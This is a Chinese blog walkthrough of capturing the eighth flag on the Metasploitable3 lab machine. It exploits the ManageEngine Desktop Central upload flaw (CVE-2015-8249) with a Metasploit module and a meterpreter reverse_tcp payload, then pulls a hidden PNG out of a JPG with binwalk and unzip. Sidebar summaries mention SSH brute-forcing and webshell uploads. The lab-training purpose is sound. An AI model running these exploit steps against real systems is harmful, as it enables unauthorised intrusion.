Metasploitable3-Ace of Hearts 第八个flag

最新推荐文章于 2021-08-31 21:38:52 发布
最新推荐文章于 2021-08-31 21:38:52 发布
阅读量983 收藏 1
点赞数 1
分类专栏: 安全 文章标签: metasploitable3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/avasy/article/details/86760407
版权

这是第八个flag.
结合之前的信息搜集,我们打开nessus的扫描报告
CVE-2015-8249

ZOHOManageEngineDesktopCentral(DC)是美国卓豪(ZOHO)公司的一套桌面管理解决方案。该方案包含软件分发、补丁管理、系统配置、远程控制等功能模块,可对桌面机以及服务器管理的整个生命周期提供支持。ZOHOManageEngineDC9版本中的FileUploadServlet类存在安全漏洞。远程攻击者可借助‘ConnectionId’参数利用该漏洞上传和执行任意的文件。

这一次准备用ManageEngine Desktop Central这个版本对应的漏洞了。
用浏览器打开相关网页

启动msf,搜索相应的漏洞利用模块,CVE-2015-8249

use exploit/windows/http/manageengine_connectionid_write
show options
set rhost 192.168.0.100
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.0.108

由于我的靶机对应的目标端口是8022,不是默认的8020,所以第一次没意识到这一点,攻击失败

第二次修改一下对应的端口,set rport 8022
exploit

拿到shell了
提权不成功

直接找flag,
flag都是在User目录里面的,我现在先切换到user目录下,再用search命令查询Ace_of_Heart
没找到,只好根据先前的经验找了

最后我在C:\Users\Public\Pictures这个目录下找到
ace_of_hearts.jpg这个文件,居然是.jpg格式的。(捂脸)


先把它下载到本地

打开我的用户目录
它就在那里,双击打开

但这不是我们要找的红心A,在前面我找的几个flag都是png格式的,而这个是.jpg格式的

所以我需要用hexeditor将它打开分析一下
但是令我失望的是,没有什么异常的地方

我只好上另外一个kali里面专门对付隐写的工具
binwalk

binwalk是一个固件分析工具,旨在协助研究人员对固件非分析,提取及逆向工程用处。简单易用,完全自动化脚本,并通过自定义签名,提取规则和插件模块,还重要的一点的是可以轻松地扩展。

binwalk ace_of_hearts.jpg

果然内有乾坤
使用foremost工具将图片分离出来

foremost这个工具在分离图片完成后,会将处理完的文件放在它自动生成的output文件夹中,现在只要找到它进入。

另外一个办法就是将ace_of_hearts.jpg重命名为zip文件,因为刚才binwalk分析它的文件里面有zip压缩包

cp ace_of_hearts.jpg ace_of_hearts.zip
unzip ace_of_hearts.zip
ace_of_hearts.png解压出来了

最后就是display ace_of_hearts.png
将其显示出来

avasy
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metasploitable3 第一个flag, King of Diamond
avasy的博客
02-01 2937
nmap扫描对应的端口 192.168.0.105 8585 tcp http open Apache httpd 2.2.21 (Win64) PHP/5.3.10 用浏览器访问一下 打开后网页的下方有一个phpinfo和phpadmin,这时候可以点进去看一下,看相关的信息 从phpinfo中我们得到以下有关靶机的信息 靶机系统版本: Windows NT METASPLOITABLE3 6....
红队环境自动化部署工具的利用
slash_HK的博客
02-09 2806
一款批脚本处理工具,适用于kali,Ubuntu,windows等,用于自动化部署红队工作中所需要的基础环境,方便快捷
Metasploitable3-flag
Makboli的博客
08-19 838
Metasploitable3-flag 写这个文章是因老师给了我一个Metasploitable3的靶机,就来搞搞玩玩,然后经过不断地乱撞,最终搞到了15个flag,以下是我寻找15个flag的过程,希望小白的文章能对大家有所帮助。 ace_of_hearts 1.ace_of_hearts 这里刚刚拿到靶场环境,就随便翻了翻电脑里的文件,发现了一张红桃A 然后感觉这应该就是一个flag,打开kali尝试连接该靶机172.21.11.227. 先nmap扫一下,发现了8022端口可以搞一搞 然后打开msf
Metasploitable3-flag-six_jack_four
Makboli的博客
08-24 368
Metasploitable3 继上次的继续为师傅们更新!最近生活不如意,但还是要调整好心情继续冲! six_of_diamonds 因为我们之前是扫到了21端口开启,就从21端口下手,因为21端口是ftp服务,大胆一点直接尝试连接ftp 账号vagrant,密码vagrant。因为之前就总是这个,结果一试就连上了,省去了爆破的时间。 将six_of_diamonds.zip文件复制下来,需要密码,也猜测vagrant。结果也对了。 如果不对的话就考虑fcrackzip爆破了 打开拿到flag jack_
Metasploitable3-flag{jack_seven_joker}
Makboli的博客
08-20 681
Metasploitable3 继上一次的两个flag,这次再为大家更新两个新的,希望对大家有帮助。 1.Jack_of_hearts 2.seven_of_spades 3.joker 前言 继上一次的两个flag,这次再为大家更新两个新的,希望对大家有帮助。 1.Jack_of_hearts 第一次扫描发现了22端口的ssh也是可以搞一搞的 接下来我们用kali自带的hydra爆破,利用hydra里面的爆破,爆破用户名和密码,这里其实只需要爆破密码即可。 相关命令:hydra -L username.t
react-ace:React Ace组件
02-04
版本8注意! :我们已经停止了对Brace的支持,现在使用Ace-build。 请阅读有关如何迁移的文档。 示例正在更新。 安装 npm install react-ace ace-builds yarn add react-ace ace-builds 基本用法 import React ...
ngx-ace-wrapper:Ace的角度包装库
05-14
要使用该库,您还应该熟悉Ace文档,因为该文档仅说明了该包装程序的详细信息。 快速链接 | | 建立图书馆 npm install npm run build 运行示例 npm install npm run start 安装和使用 npm install ngx-ace-wrapper -...
一加 ACE3-OnePlus Ace3-9008资源免权限+详细图文教程
最新发布
03-12
一加 ACE3-OnePlus Ace3-9008资源免权限+详细图文教程 资源说明: 9008刷写固件。无权限刷写 任意刷写 会进入9008端口 会基础玩机刷写固件的友友下载 资源带刷写教程步骤 资源在网盘 需要一定刷机常识和玩机基础...
用Kanban-Ace框架改进Scrum
02-25
这些改进通过以下做法完成:1.AkashiBridge:这是一种新的工具,它可以在Kanban-Ace板的背景下使用每一个Scrum事件,包括Sprint、Sprint计划、每日站立短会、Sprint重整和回顾等。2.Kanban-Ace板:它内置...
针对 Metasploitable 3 的渗透测试
07-31
针对 Metasploitable 3 的渗透测试-漏洞银行大咖面对面5-Demon
Metasploitable3-flag{K-4-K-}
Makboli的博客
08-31 303
Metasploitable3-flag{K-4-K-} 废话不多说,直接上干货 king_of_clubs 我们下载下来的kingofclubs为.exe文件,将它放进kali里面,利用命令:upx -d kingofclubs.exe 做脱壳处理 之后把它拿出来改为zip文件尝试查看里面的内容。 看到了COFF_SYMBOLS,这个表示疑问,感觉可能会成为入手点。便百度了一下COFF,然后搜到了.out文件的相关知识 看完之后感觉可能是有东西隐藏在了.out文件下吧 尝试一下将kingofclubs.e
Metasploitable3-Six of Diamonds 第三个flag
avasy的博客
02-02 1667
在上次渗透中,我发现靶机对应的8585端口里面存在一个upload目录,这让我想到靶机可能存在文件上传漏洞,尝试上传一个菜刀马。 我用到了kali的工具cadaver 在上传php文件前,我首先上传一个txt文件验证一下 先在kali内新建一个txt文件 保存后上传 上传成功,打开浏览器验证 用gedit新建一个chopper.php文件,用cadver上传 上传成功 然后用菜刀连接 我...
[CVE-2015-8399]Confluence敏感信息泄露
公众号shadow sock7
05-08 1886
影响版本: 5.2 / 5.8.14 / 5.8.15 [PoC] http://<Confluence Server>/spaces/viewdefaultdecorator.action?decoratorName=<FILE> http://<Confluence Server>/admin/viewdefaultdecorator.action?decoratorName=<FILE> This
Metasploitable3-Joker 第七个flag
avasy的博客
02-02 1301
  这一次,我要捉一个小丑,joker 通过前期nmap的信息搜集,靶机开放的 161端口 snmp(public) 80端口 http 既然开着snmp服务,就先来一波snmp检测 在kali下有两个工具可以完成snmp检测, 一个是snmp-check,另外一个是msf下的 msf&gt;use auxiliary/scanner/snmp/snmp_enum模块 首先我方派出的是snmp...
Metasploitable3-Jack of Hearts 第四个flag
avasy的博客
02-02 963
  今天要拿下的是第四个flag,Jack of Heart 攻击方向是22端口 启动msf 准备好爆破的字典 在msf中搜索ssh爆破模块 使用相关模块并设置参数 set PASS_FILE ~/pass.txt set USER_FILE ~/user.txt set rhost 192.168.0.100 run 爆破完成 爆出7个session 用管理员账户进行ssh登录 找到相关f...
Metasploitable3-Jack of Clubs 第九个flag
avasy的博客
02-03 723
  这是第九个flag. 首先从nmap扫描中我们可以得出以下信息 8282/tcp open http Apache Tomcat/Coyote JSP engine 1.1 http-favicon: Apache Tomcat http-server-header: Apache-Coyote/1.1 http-title: Apache Tomcat/8.0.33 Tomcat是A...
Metasploitable3-King of Hearts 第二个flag
avasy的博客
02-01 1280
在抓捕第一个方块K的过程中,同时发现了第二个flag,红心K的踪迹,它与方块K在同一个木目录下下面,具体过程和前面第一个flag一样,略过不表 来到2016目录,点进去,再从09目录点进去 来到熟悉的目录下面 king of heart和上一个flag不同的地方在于,它的文件名并没有明明白白地写着king of hearts,而是写成metasploitable3_flag,在metaspl...
metasploitable3:从入门到。。。。。。
lm19770429的专栏
05-15 4617
metasploit2中太容易拿漏洞,ms-080_67
vue3-ace-editor
07-27
Vue3-ace-editor是一个第三方插件,用于在Vue3中实现JSON编辑器。要使用该插件,首先需要安装依赖,可以通过运行命令`npm i vue3-ace-editor`来安装。然后,在Vue组件中引入所需的模块,例如`reactive`和`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值